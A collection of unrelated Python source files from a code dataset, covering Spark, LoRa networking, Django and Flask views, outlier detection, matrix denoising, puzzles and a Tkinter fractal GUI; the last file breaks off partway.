+{"seq_id":"159473672","text":"__author__ = 'Prashanth Ayyavu'\n\nfrom pyspark import SparkContext\n\nlogFile = \"/Users/prashanthayyavu/projects/software/spark-1.5.2-bin-hadoop2.6/README.md\"\n\nsc = SparkContext(\"local\", \"Simple App\")\nlogData = sc.textFile(logFile).cache()\n\n# Transformation\n# An operation performed on a RDD\n# Takes an user-defined function and applies it to all elements of the RDD\n# And produces a new RDD\n\npairs = logData.map(lambda s: (s, 1))\ncounts = pairs.reduceByKey(lambda a, b: a + b)\n\n'''\nWhile most Spark operations work on RDDs containing any type of objects, a few special operations are only available on RDDs of key-value pairs.\nThe most common ones are distributed “shuffle” operations, such as grouping or aggregating the elements by a key.\n\nKeyValue RDDs are called as pair RDDs\n\nexpose operations that allow you to act on each key in parallel or regroup data across the network\npair RDDs have a reduceByKey() method that can aggregate data separately for each key, and\na join() method that can merge two RDDs together by grouping elements with the same key\n\nConstructing a KeyValue or pairRDD from a normal RDD\nIt is common to extract fields from an RDD (representing, for instance, an event time, customer ID, or other identifier) and use those fields as keys in pair RDD operations.\n\nTuples:\nspark has functions... that can work on KeyValuePair RDD\nIn Python and Scala, for these functions on keyed data to work -- we need to return an RDD composed of tuples\nIn Java we dont have a built-in type tuple\n\nscala.Tuple2\nIn Java, key-value pairs are represented using the scala.Tuple2 class from the Scala standard library.\nYou can simply call new Tuple2(a, b) to create a tuple, and access its fields later with tuple._1() and tuple._2().\n\nRDDs of key-value pairs are represented by the JavaPairRDD class.\n\nJava : mapToPair() or flatMapToPair()\nYou can construct JavaPairRDDs from JavaRDDs using special versions of the map operations, like mapToPair and flatMapToPair.\nThe JavaPairRDD will have both standard RDD functions and special key-value ones.\n\nPython, Scala : map()\n\nCollections to pairRDDs\nPythonPairCollection -> parallelize() -> pairRDD\nScalaPairCollection -> parallelize() -> pairRDD\nJavaPairCollection -> parallelizePairs() -> pairRDD\n\nTransformation\nPairRDDs are allowed to use all the transformations available to standard RDDs.\n+ some unique transformations for pairRDDs.\nSince pair RDDs contain tuples, we need to pass functions that operate on tuples rather than on individual elements.\n\n'''\n","sub_path":"spark.python/src/KeyValuePairRDD.py","file_name":"KeyValuePairRDD.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"369889610","text":"#coding=utf-8\n#/usr/bin/env python3\n\n\nclass Person(object):\n __slots__=(\"name\",\"age\",\"addr\")\n\n\n\nP=Person()\n\nP.name=\"laowang\"\nP.age=33\nP.addr=\"Nanjing\"\n\n\nprint(P.name+\" \"+str(P.age)+\" \"+P.addr)\n\nP.tel=\"123456\"\nprint(P.tel)\n","sub_path":"section-2-python-advanced/04-namespace/slots.py","file_name":"slots.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"161035806","text":"'''\r\n # https://accounts.google.com/SignUpWithoutGmail?service=mail&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dwm<mpl=default\r\n # This modules task is to decode the example above to example below\r\n # https://accounts.google.com/SignUpWithoutGmail?\r\n # https://mail.google.com/mail/?tab=wm<mpl=default\r\n # Version 2.0.\r\n # A new version is released the first of every two weeks.\r\n # This project is maintained by Optical Quantum Virus.\r\n # this project cannot and will not be used in a commercial use only for personal or private use.\r\n'''\r\n\r\n# noinspection PyMethodMayBeStatic\r\nfrom queue import Queue\r\nfrom urllib import parse\r\n\r\n\r\n# noinspection PyMethodMayBeStatic\r\nclass URLDecoder:\r\n # Constructor for URLDecoder\r\n def __init__(self):\r\n super().__init__()\r\n\r\n # This will decode the url\r\n def Decode(self, url, queue: Queue()):\r\n\r\n # we are decoding the url\r\n decoded = parse.unquote(url)\r\n\r\n # this is the url we are going to listen for\r\n symbols = [\"?\", \"&\", \"=\"]\r\n\r\n # this will keep track of the link\r\n link = \"\"\r\n\r\n # we are looping through the decoded link\r\n for i in decoded:\r\n\r\n # checking if the char is in symbols list\r\n if str(i) not in symbols:\r\n\r\n # appending the char to the string\r\n link += i\r\n else:\r\n\r\n # we are checking if the link starts with http or https\r\n if not str(link).startswith(\"http\") or not str(link).strip(\"https\"):\r\n\r\n # setting the string link to empty\r\n link = \"\"\r\n else:\r\n print(\"\\033[1;45;10m\" + str(link).strip())\r\n\r\n # we are adding the link to the queue\r\n queue.add(str(link).strip())\r\n\r\n # setting the string link to empty\r\n link = \"\"\r\n","sub_path":"Spider/Decoders/URLDecoder.py","file_name":"URLDecoder.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"137023938","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# https://www.hackerrank.com/challenges/sherlock-and-anagrams/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=dictionaries-hashmaps\n# Complete the sherlockAndAnagrams function below.\ndef sherlockAndAnagrams(substr):\n # get all sub strings\n # dict of substrings -> (instanceCount:number, letters:dict{letter -> count})\n # instanceCount - for anagrams that are identical (pairs would be count - 1)\n # letters - must have same letter/count pairs as other substrings of same length\n\n # substrings\n substrings = [\n substr[i: j]\n for i in range(len(substr))\n for j in range(i + 1, len(substr) + 1)\n ]\n\n # note, I made my own substring combination before in 02_two_strings.py:\n # foo\n # f, o, o, fo, oo, foo\n # 0:1, 1:2, 2:3, 0:2, 1:3, 0:3\n # 0:1, 0:2, 0:3, 1:2, 1:3, 2:3\n\n # def get_substrings(s):\n # substrings = set()\n # for i in range(len(s)):\n # for j in range(i + 1, len(s) + 1):\n # substr = s[i:j]\n # substrings.add(substr)\n #\n # return substrings\n\n # get dict of instance counts and letter counts\n stats = {}\n for substr in substrings:\n if not stats.get(substr):\n letters = {}\n for char in substr:\n if not letters.get(char):\n letters[char] = 1\n else:\n letters[char] = letters[char] + 1\n\n stats[substr] = {\n 'instance_count': 1,\n 'length': len(substr),\n 'letters': letters\n }\n else:\n substr_stats = stats[substr]\n substr_stats['instance_count'] = substr_stats['instance_count'] + 1\n\n # print(stats)\n\n # for each substring (stats key), look for other substrings of same length that have same letter counts\n\n # for substr, substr_stats in stats.items():\n\n ##\n # ugg, nested loop is not elegant, and no way its going to pass perf\n\n ##\n # solution 2: sub strings, with characters sorted\n\n substr_counts = {}\n for substr in substrings:\n substr_sorted = ''.join(sorted(substr))\n if not substr_counts.get(substr_sorted):\n substr_counts[substr_sorted] = 1\n else:\n substr_counts[substr_sorted] = substr_counts[substr_sorted] + 1\n\n # anagrams_count = 0\n # for counts in substr_counts.values():\n # anagrams_count += (counts - 1)\n\n # return anagrams_count\n\n ##\n # oops, they want all combinations, need to factorial?\n # anagrams_count = 0\n # for counts in substr_counts.values():\n # if counts == 1:\n # continue\n #\n # anagrams_count += math.factorial(counts - 1)\n\n ##\n # oops, factorial is not how you calculate combinations\n # n choose r (where r = 2) since we want pairs\n anagrams_count = 0\n for counts in substr_counts.values():\n # math.comb only works in py 3.8?\n # anagrams_count += math.comb(counts, 2)\n\n if counts <= 1:\n continue\n\n # nCr = (n!) / (r!(n - r)!)\n anagrams_count += int(\n math.factorial(counts) /\n (2 * math.factorial(counts - 2)))\n\n # return substr_counts\n return anagrams_count\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n s = input()\n\n result = sherlockAndAnagrams(s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","sub_path":"py/hacker-rank/interview_prep/02_hashmaps/03_sherlock_and_anagrams.py","file_name":"03_sherlock_and_anagrams.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"8087214","text":"import time\nimport json\nimport pycom\nimport socket\nimport struct\nfrom network import LoRa\nfrom machine import Timer\n\nclass loraAPI:\n\n # A basic package header,\n # B: 1 byte for the deviceId,\n # B: 1 byte for the package size,\n # %ds: Formated string for string\n _LORA_GATEWAY_PKG_FORMAT = \"!BB%ds\"\n\n # A basic package header,\n # B: 1 byte for the deviceId,\n # B: 1 bytes for the package size\n _LORA_NODE_PKG_FORMAT = \"BB%ds\"\n\n # A basic ack package,\n # B: 1 byte for the deviceId,\n # B: 1 bytes for the package size,\n # B: 1 byte for the Ok (200) or error messages\n _LORA_PKG_ACK_FORMAT = \"BBB\"\n\n # Please pick the region that matches where you are using the device:\n # Asia = LoRa.AS923\n # Australia = LoRa.AU915\n # Europe = LoRa.EU868\n # United States = LoRa.US915\n _LORA_REGION = LoRa.AU915\n\n _LORA_ACKNOWLEDGEMENT_TIMEOUT = 3 # seconds\n\n def __init__(self, device_id=0, device_name='No-name', device_colour='white', device_colour_code=0xFFFFFF, is_gateway=False):\n # Each newly created object holds onto these parameters (device_id, etc.)\n # because it will need to use them later.\n self.device_id = device_id\n self.device_name = device_name\n self.device_colour = device_colour\n self.device_colour_code = device_colour_code\n self.is_gateway = is_gateway\n\n # RGBLED\n # Disable the on-board heartbeat (blue flash every 4 seconds)\n # We'll use the LED to identify each unit with different colours\n pycom.heartbeat(False)\n time.sleep(0.1) # Workaround for a bug.\n # Above line is not actioned if another\n # process occurs immediately afterwards\n pycom.rgbled(self.device_colour_code)\n print(\"{} is {}\".format(self.device_name, self.device_colour))\n\n # I don't understand why this difference, but you can imaging\n # the gateway is lisening for messages from any node and the\n # nodes only want to send messages to the gateway.\n if self.is_gateway:\n self.lora = LoRa(mode=LoRa.LORA, rx_iq=True, region=loraAPI._LORA_REGION)\n else:\n self.lora = LoRa(mode=LoRa.LORA, tx_iq=True, region=loraAPI._LORA_REGION)\n\n self.sock = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n self.sock.setblocking(False)\n\n def send(self, message):\n package = struct.pack(loraAPI._LORA_NODE_PKG_FORMAT % len(message), self.device_id, len(message), message)\n self.sock.send(package)\n print(\"{}\\n{} ({}) SENT\".format(message, self.device_name, self.device_colour), end='')\n\n def to_gateway(self, submits, requests):\n\n communique = {} # empty dictionary\n\n # Only add submits if there's a dictionary of one or more submissions\n if isinstance(submits,(dict,)) and len(submits) > 0:\n communique[\"submits\"] = submits\n # elif submits is not None:\n # print(\"create_message_to_gateway() needs a of length > 0, or None, as first parameter\")\n\n if isinstance(requests,(list,)):\n communique[\"requests\"] = requests\n # elif requests is not None:\n # print(\"create_message_to_gateway() needs a of length > 0, or None, as second parameter\")\n\n if len(communique) == 0:\n return False # Message not sent\n\n self.send(json.dumps(communique))\n return True\n\n def to_node(responses):\n\n communique = {} # empty dictionary\n\n # Only add responses if there's a dictionary of one or more responses\n if isinstance(responses,(dict,)) and len(responses) > 0:\n communique[\"responses\"] = responses\n elif responses is not None:\n print(\"create_message_to_node() needs a of length > 0, or None, as a parameter\")\n\n if len(communique) > 0:\n return communique\n else:\n 
return None\n\n def to_json(self, data):\n return json.dumps(data)\n\n def from_json(self, text):\n return json.loads(text)\n\n def debug(self):\n print(\"Is Gateway: %s\" % self.is_gateway)\n print(\"Device ID : %d\" % self.device_id)\n print(\"Region : %s\" % self.lora)\n print(\"Socket : %s\" % self.sock)\n\n def receive(self):\n package = self.sock.recv(512)\n if (len(package) > 2):\n package_length = package[1]\n node_device_id, message_length, message = struct.unpack(loraAPI._LORA_GATEWAY_PKG_FORMAT % package_length, package)\n\n # If the uart = machine.UART(0, 115200) and os.dupterm(uart) are set in the boot.py this print should appear in the serial port\n print('Message from Node %d: %s' % (node_device_id, message))\n\n acknowledgement_package = struct.pack(loraAPI._LORA_PKG_ACK_FORMAT, node_device_id, 1, 200)\n # lora_sock.send(ack_package)\n self.sock.send(acknowledgement_package)\n\n def acknowledge(self):\n chrono = Timer.Chrono()\n chrono.start()\n waiting_ack = True\n while(waiting_ack):\n\n print(\".\", end=\"\")\n if (chrono.read() > loraAPI._LORA_ACKNOWLEDGEMENT_TIMEOUT):\n print(\"NO ACK\") # No acknowledgement receivedself.\n break\n\n package = self.sock.recv(256)\n if (len(package) > 0):\n device_id, package_len, ack = struct.unpack(loraAPI._LORA_PKG_ACK_FORMAT, package)\n if (device_id == self.device_id):\n if (ack == 200):\n waiting_ack = False\n # If the uart = machine.UART(0, 115200) and os.dupterm(uart) are set in the boot.py this print should appear in the serial port\n print(\"ACK\") # Achnowledgement recieved, message understood\n else:\n waiting_ack = False\n # If the uart = machine.UART(0, 115200) and os.dupterm(uart) are set in the boot.py this print should appear in the serial port\n print(\"NACK\") # Achnowledgement recieved, message NOT understood\n time.sleep(0.1)\n","sub_path":"Phase 3/node1/lib/lora_api.py","file_name":"lora_api.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
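How the node/gateway framing round-trips, shown with the same format strings loraAPI uses (toy device id and payload; this sketch also runs under plain CPython):

import struct

msg = b"hello"
pkg = struct.pack("BB%ds" % len(msg), 7, len(msg), msg)     # node-side framing
dev_id, size, body = struct.unpack("!BB%ds" % pkg[1], pkg)  # gateway-side parse
assert (dev_id, size, body) == (7, 5, b"hello")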
+{"seq_id":"201831203","text":"import random\n\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom course.models import *\nfrom course.services import get_enrolled_subjects, get_recommmendations\nfrom .forms import *\nfrom .models import Student\n\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(\n request, f'Your account has been created! You are now able to log in')\n messages.success(\n request, f'Please Update your profile first.')\n return redirect('users-login')\n else:\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form})\n\n\n@login_required\ndef profile(request):\n account = get_object_or_404(Student, account = request.user)\n context = {'home_page': 'active',\n 'account' : account,\n }\n return render(request, 'users/profile.html', context)\n\n@login_required\ndef EditProfile(request):\n student = get_object_or_404(Student, account = request.user)\n if request.method == \"POST\":\n p_form = EditProfileForm(request.POST,request.FILES, instance= student)\n u_form = UserUpdateForm(request.POST, instance= request.user)\n if p_form.is_valid() and u_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request,'Your Profile has been updated!')\n return redirect('users-profile')\n else:\n messages.error(request, p_form.errors)\n messages.error(request, u_form.errors)\n else:\n p_form= EditProfileForm()\n u_form =UserUpdateForm()\n context={'p_form': p_form, 'u_form': u_form}\n return render(request, 'users/update-profile.html', context )\n\n\n\n","sub_path":"dbd-course-recommender/course_recommender/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"188880519","text":"# Mean/median/std\n# LOF\n# Binning\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import LocalOutlierFactor\nimport numpy as np\npd.options.display.width = 0\n\ndef localOutlierFactor(data, predict, k):\n    # Fit LOF; novelty=True exposes the public score_samples API\n    clf = LocalOutlierFactor(n_neighbors=k+1, algorithm='auto', contamination=0.1, novelty=True, n_jobs=-1)\n    clf.fit(data)\n\n    # Compute the distance to the k nearest points\n    predict['k distances'] = clf.kneighbors(predict)[0].max(axis=1)\n\n    # score_samples returns the negative LOF, so negate it: larger = more outlying\n    predict['local outlier factor'] = -clf.score_samples(predict.iloc[:, :-1])\n    return predict\n\ndef plotLOF(result, method, k):\n    # Plot LOF scores, colouring outliers and inliers separately\n    plt.rcParams['axes.unicode_minus'] = False\n    plt.figure(figsize=(8, 4)).add_subplot(111)\n    plt.scatter(result[result['local outlier factor'] > method].index,\n                result[result['local outlier factor'] > method]['local outlier factor'], c='blue', s=50,\n                marker='.', alpha=None,\n                label='Outliers')\n    plt.scatter(result[result['local outlier factor'] <= method].index,\n                result[result['local outlier factor'] <= method]['local outlier factor'], c='green', s=50,\n                marker='.', alpha=None, label='Normal')\n    plt.hlines(method, -2, 2+max(result.index), linestyles='--')\n    plt.xlim(-2, 2+max(result.index))\n    plt.title('K='+str(k)+', LOF Outlier Detector', fontsize=13)\n    plt.xlabel('Index', fontsize=15)\n    plt.ylabel('Outlier Factor', fontsize=15)\n    plt.legend()\n    fig1 = plt.gcf()\n    plt.show()\n    fig1.savefig('outliers_'+str(k)+'.png')\n\ndef lof(data, predict=None, k=5, method=1, plot=False):\n    # Default to scoring the training data itself\n    if predict is None:\n        predict = data.copy()\n\n    # Compute LOF\n    predict = localOutlierFactor(data, predict, k)\n    if plot:\n        plotLOF(predict, method, k)\n\n    # Split outliers and inliers at the threshold\n    outliers = predict[predict['local outlier factor'] > method].sort_values(by='local outlier factor')\n    inliers = predict[predict['local outlier factor'] <= method].sort_values(by='local outlier factor')\n    return outliers, inliers\n\ndef readData(file_name):\n    df = pd.read_csv(file_name, sep=',')\n    return df\n\ndef openFile(file_name):\n    f = open(file_name, 'w')\n    return f\n\ndef equalWidthBinning(myData, attr, f):\n    # Compute min and max values, then add 1 to each side.\n    minReactionNums = myData[attr].min() - 1\n    maxReactionNums = myData[attr].max() + 1\n\n    # Create evenly spaced bins using min and max\n    n_bin = 10  # Number of bins\n    step = (maxReactionNums - minReactionNums) / n_bin\n    bins = np.arange(minReactionNums, maxReactionNums + step, step)\n\n    # Look at new bins. This is equi-width binning\n    reactionBins = np.digitize(myData[attr], bins)\n\n    # Count the number of values in each bin\n    reactionBinCounts = np.bincount(reactionBins)\n    print(\"\\n\\nBins are: \\n \", reactionBins)\n    f.write(\"\\n\\nBins are: \\n \"+str(reactionBins)+'\\n')\n    print(\"\\nBin count is \", reactionBinCounts)\n    f.write(\"\\nBin count is : \"+str(reactionBinCounts)+'\\n')\n\n    # Create a new variable bin_group that groups values into bins, e.g. < 200, 200-400, etc.\n    # For this example, I use the bins created above\n    myData['bin_group'] = np.digitize(myData[attr], bins)\n    print(\"\\nAfter bin_group is added we have:\\n\", myData[:10])\n    f.write(\"\\nAfter bin_group is added we have:\\n\"+str(myData[:10])+'\\n')\n\n    # Another option to see actual bins\n    myData['bin_ranges'] = pd.cut(myData[attr], bins)\n\n    # Print Bin Counts in different ways\n    print(\"\\nBin Counts\\n\")\n    f.write(\"\\nBin Counts\\n\")\n    print(myData['bin_ranges'].value_counts())\n    f.write(str(myData['bin_ranges'].value_counts())+'\\n')\n\n\ndef equalDepthBinning(myData, attr, f, mode, bins):\n    names = range(1, 4)\n    myData[mode+'_bin_group'] = pd.cut(myData[attr], bins, labels=names)\n\n    # Check the data to see the new column\n    print(\"\\n New column of data:\")\n    f.write(\"\\n New column of data: \\n\")\n    print(myData[:10])\n    f.write(str(myData[:10])+'\\n')\n\n    # Print Bin Counts in different ways\n    print(\"\\nBin Counts\\n\")\n    f.write(\"\\nBin Counts\\n\")\n    print(myData[mode+'_bin_group'].value_counts())\n    f.write(str(myData[mode+'_bin_group'].value_counts())+'\\n')\n    return myData\n\n\nif __name__ == \"__main__\":\n\n    print('Running statistical record, LOF, and Binning')\n    df = readData('../data/energy_commercial.csv')\n\n    f = openFile('commercial_record.txt')\n    # Mean/median/std data\n    f.write('Mean/median/std before LOF\\n'+str(df.describe()))\n\n    # LOF algorithm\n    # Drop the first two (non-feature) columns before scoring\n    x = [0, 1]\n    df1 = df.drop(df.columns[x], axis=1)\n\n    f.write('\\n\\nLOF Algorithm:\\n')\n    for k in [100, 200, 500]:\n        outliers, inliers = lof(data=df1, k=k, plot=True, method=1)\n        print('k='+str(k)+' : '+str(len(outliers))+' outliers')\n        f.write('k='+str(k)+' : '+str(len(outliers))+' outliers\\n')\n        outliers.to_csv('outliers_'+str(k)+'.csv', sep=',')\n\n        if k == 200:\n            outlier_df = outliers\n\n    # Use the k=200 result\n    out_index = outlier_df.index.to_list()\n    f.write('\\nOutlier Indexes: '+str(out_index)+'\\n')\n\n    # Remove outliers by outlier indexes\n    df = df.drop(out_index)\n\n    # Mean/median/std data\n    f.write('\\nMean/median/std after LOF\\n'+str(df.describe()))\n\n    # Test by LOF\n    # df2=df.drop(df.columns[x], axis=1)\n    # outliers, inliers=lof(data=df2, k=500, plot=True, method=1)\n    # print(len(outliers))\n\n    # Equal-width binning\n    binning_attr = ['elec_score', 'gas_score']\n    f.write('\\n\\n\\nEqual-width binning: \\n')\n    for i in binning_attr:\n        df1 = df.copy()\n        f.write('\\nattr: '+i+'\\n')\n        equalWidthBinning(df1, i, f)\n\n    # Equal-depth binning\n    df2 = df.copy()\n    f.write('\\nEqual-depth binning: \\n')\n    f.write('\\nattr: elec_score\\n')\n\n    # Pre-computed quantile edges for elec/gas\n    bins1 = [-1, 1720, 10991, 1181389]\n    bins2 = [-1, 1674, 24027, 4368494]\n    df2 = equalDepthBinning(df2, 'elec_mwh', f, 'elec', bins1)\n    df = equalDepthBinning(df2, 'gas_mcf', f, 'gas', bins2)\n    df.to_csv('cleaned_energy_commercial.csv', sep=',', index=False)\n\n    f.close()","sub_path":"buildings_and_industry/proj2_data_analysis/commercial_process/analysis/outlier_process.py","file_name":"outlier_process.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
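The record above hand-rolls equal-width binning with np.arange/np.digitize and equal-depth binning with pre-computed edges. As a minimal sketch, assuming nothing from that file: pandas ships both strategies directly as pd.cut (equal-width) and pd.qcut (equal-depth); the column name, bin counts, and random data here are illustrative only.

import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
df = pd.DataFrame({'elec_mwh': rng.exponential(1000, size=500)})

# Equal-width: 10 bins of identical span (what equalWidthBinning builds by hand).
df['width_bin'] = pd.cut(df['elec_mwh'], bins=10)

# Equal-depth: 3 bins with roughly equal counts; pd.qcut derives the quantile
# edges that the script hard-codes in bins1/bins2.
df['depth_bin'] = pd.qcut(df['elec_mwh'], q=3, labels=[1, 2, 3])

print(df['width_bin'].value_counts().sort_index())  # uniform widths, varying counts
print(df['depth_bin'].value_counts())               # roughly uniform counts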
+{"seq_id":"317256775","text":"import numpy as np\nfrom scipy.linalg import null_space\nfrom numpy.linalg import inv\n\n'''\nParameters Explanation:\nmat: input noisy matrix\nm: Parameter of NR_B, controlling the extent of matrix modification\neps1: Value added to the whole matrix in the preprocessing step\neps2: Value added to the diagonal in the preprocessing step\n'''\n\ndef NR_B(mat, m, eps1, eps2):\n\n    # preprocessing\n    n = mat.shape[0]\n    mat = mat + eps1 + eps2 * np.eye(n)\n\n    # convert into a transition matrix\n    P1 = mat / mat.sum(1).reshape(-1, 1)\n    P2 = m * P1.dot(inv(((m-1)*np.eye(n) + P1)))\n\n    # subtract the smallest negative value from each row containing negative numbers\n    row_fac = np.minimum(P2.min(1), 0)\n    P2 = P2 - row_fac.reshape(-1, 1)\n    P2 = P2 / P2.sum(1).reshape(-1, 1)\n\n    # compute the stationary distribution and the output matrix\n    # (null_space returns one column per null-space vector)\n    stationary_d = null_space((P2 - np.eye(n)).T)\n    if stationary_d.shape[1] == 0:\n        print('The stationary distribution does not exist!')\n    elif stationary_d.shape[1] > 1:\n        print('The stationary distribution is not unique!')\n    else:\n        stationary_d = stationary_d / stationary_d.sum()\n        net_new = np.diag(abs(stationary_d.T)[0]).dot(P2)\n        net_new = net_new + net_new.T\n        output_network = net_new - np.diag(np.diag(net_new))\n        output_network = output_network / output_network.max()\n        return output_network\n","sub_path":"methods/NR_B.py","file_name":"NR_B.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
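A sketch of how NR_B might be invoked; the symmetric test matrix and the m/eps1/eps2 values below are made up for illustration, not taken from the source, and assume NR_B is importable from the module above.

import numpy as np

rng = np.random.default_rng(1)
n = 20
noise = rng.random((n, n))
sym = (noise + noise.T) / 2  # symmetric, nonnegative 'noisy network'

# Strictly positive after the eps preprocessing, so the stationary
# distribution exists and is unique and NR_B returns a matrix.
denoised = NR_B(sym, m=2, eps1=1e-3, eps2=1e-3)
print(denoised.shape, float(denoised.max()))  # (20, 20) 1.0 after max-normalisation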
+{"seq_id":"205987291","text":"from nfmanagementapi.models import ServiceObject\nfrom nfmanagementapi.schemata import ServiceObjectSchema\nfrom marshmallow.exceptions import ValidationError\nfrom .BaseResource import BaseResource\nfrom flask import request\nfrom app import db\nfrom uuid import uuid4\n\npath = 'service_objects'\nendpoint = 'service_objects'\n\n\nclass ServiceObjectCollectionResource(BaseResource):\n    def get(self):\n        \"\"\"List Service Objects\n        ---\n        description: List all service objects\n        tags:\n          - Service Objects\n        responses:\n          200:\n            content:\n              application/json:\n                schema:\n                  type: array\n                  items: ServiceObjectSchema\n        \"\"\"\n        objects = ServiceObject.query.all()\n        schema = ServiceObjectSchema(many=True)\n        return schema.dump(objects)\n\n    def post(self):\n        \"\"\"Create service object\n        ---\n        description: Create a service object\n        tags:\n          - Service Objects\n        requestBody:\n          content:\n            application/json:\n              schema: ServiceObjectSchema\n        responses:\n          201:\n            description: Created\n            content:\n              application/json:\n                schema: ServiceObjectSchema\n          422:\n            description: Unprocessable Entity\n            content:\n              application/json:\n                schema: MessageSchema\n        \"\"\"\n        messages = []\n        json_data = request.get_json()\n        try:\n            data = ServiceObjectSchema().load(json_data)\n        except ValidationError as err:\n            for msg in err.messages:\n                messages.append(\"{}: {}\".format(msg, err.messages[msg]))\n            return {\"messages\": messages}, 422\n\n        # 'obj' instead of 'object' to avoid shadowing the builtin\n        obj = ServiceObject()\n        error = False\n        for key in data:\n            try:\n                setattr(obj, key, data[key])\n            except ValueError as e:\n                error = True\n                messages.append(e.args[0])\n        if error:\n            return {\"messages\": messages}, 422\n        db.session.add(obj)\n        db.session.commit()\n        db.session.refresh(obj)\n        # Return 201 Created, matching the documented response\n        return ServiceObjectSchema().dump(obj), 201\n","sub_path":"nfmanagementapi/resources/ServiceObjectCollectionResource.py","file_name":"ServiceObjectCollectionResource.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"648538720","text":"from ChainingHashTableMap import ChainingHashTableMap\nfrom ArrayStack import ArrayStack\nfrom ArrayQueue import ArrayQueue\n\n\ndef create_palindrome(letters):\n    # Count the occurrences of each letter\n    cht = ChainingHashTableMap()\n    for i in letters:\n        try:\n            cht[i] += 1\n        except KeyError:\n            cht[i] = 1\n    queue = ArrayQueue()\n    stack = ArrayStack()\n    # Half of each pair goes to the queue (front half), the mirror half to the stack\n    for i in cht:\n        for j in range(cht[i] // 2):\n            queue.enqueue(i)\n            stack.push(i)\n    # At most one letter with an odd count can sit in the middle\n    for i in cht:\n        if cht[i] % 2 == 1:\n            queue.enqueue(i)\n            break\n    # Append the mirrored half by draining the stack\n    while not stack.is_empty():\n        queue.enqueue(stack.pop())\n    return \"\".join([queue.dequeue() for i in range(len(queue))])\n\n\ndef main():\n    print(create_palindrome(\"asdfnmbemaehbdsafbmdsfbdnsfbewhreruituih\"))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"lab/14/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
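The queue/stack version above drains half of each letter pair into a queue and mirrors it back from a stack. For comparison, a standard-library sketch of the same idea; this helper is illustrative and not part of the exercise's ADT-based solution.

from collections import Counter

def create_palindrome_counter(letters):
    counts = Counter(letters)
    # Half of each pair, sorted for determinism; one odd-count letter may sit in the middle.
    half = ''.join(ch * (n // 2) for ch, n in sorted(counts.items()))
    middle = next((ch for ch, n in counts.items() if n % 2 == 1), '')
    return half + middle + half[::-1]

print(create_palindrome_counter("asdfnmbemaehbdsafbmdsfbdnsfbewhreruituih"))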
+{"seq_id":"587660766","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nfrom tkinter import *\r\ntry:\r\n    from PIL import Image, ImageTk\r\nexcept ImportError:\r\n    print(\"Impossible d'importer PIL\")\r\n    import Image\r\n\r\nfrom M_fractale import *\r\nfrom M_param import *\r\nfrom LanguageGUI_FR import *\r\n\r\n# Interface class: initialises the main window and its dependencies\r\n#\r\n# TODO: Multi-threading / menu + display\r\n#       Save in jpg format\r\n#       Factor out helper functions to avoid redundant widget creation\r\n#\r\n\r\nDEF_FP=\"C:\\\\Users\\Wyvern\\Google Drive\\Perso\\Python\\SoftFrac\\img\\\\\"\r\nDEF_WIDTH=500\r\nDEF_HEIGHT=500\r\nDEF_BORDERWIDTH=1\r\nDEF_ZOOM=800\r\nDEF_IT_MAX=40\r\n\r\nclass MainGUI:\r\n\r\n    # Constructor\r\n    def __init__(self):\r\n\r\n        # Store the language used by the GUI\r\n        self.lang=LanguageGUI_FR()\r\n\r\n        # Create the main window and its title\r\n        self._win=Tk()\r\n        welcome_label = Label(self._win, text=self.lang.main_menu.label_title)\r\n        welcome_label.pack()\r\n\r\n        # Build the window layout\r\n        winMain=Frame(self._win,width=DEF_WIDTH,height=DEF_HEIGHT,borderwidth=DEF_BORDERWIDTH)\r\n        winMain.pack(fill=\"both\")\r\n\r\n        button_quit=Button(winMain,text=self.lang.main_menu.quit_button,\r\n                           command=self._win.quit)\r\n        button_quit.pack()\r\n\r\n        button_save=Button(winMain,text=self.lang.main_menu.save_button,command=self.save)\r\n        button_save.pack(side=\"right\")\r\n\r\n        # Parameter storage variables, bound to the checkboxes and entries\r\n        self.value_checkbox_red=IntVar()\r\n        self.value_checkbox_green=IntVar()\r\n        self.value_checkbox_blue=IntVar()\r\n        self.value_entry_zoom=IntVar()\r\n        self.value_entry_dimX=IntVar()\r\n        self.value_entry_dimY=IntVar()\r\n        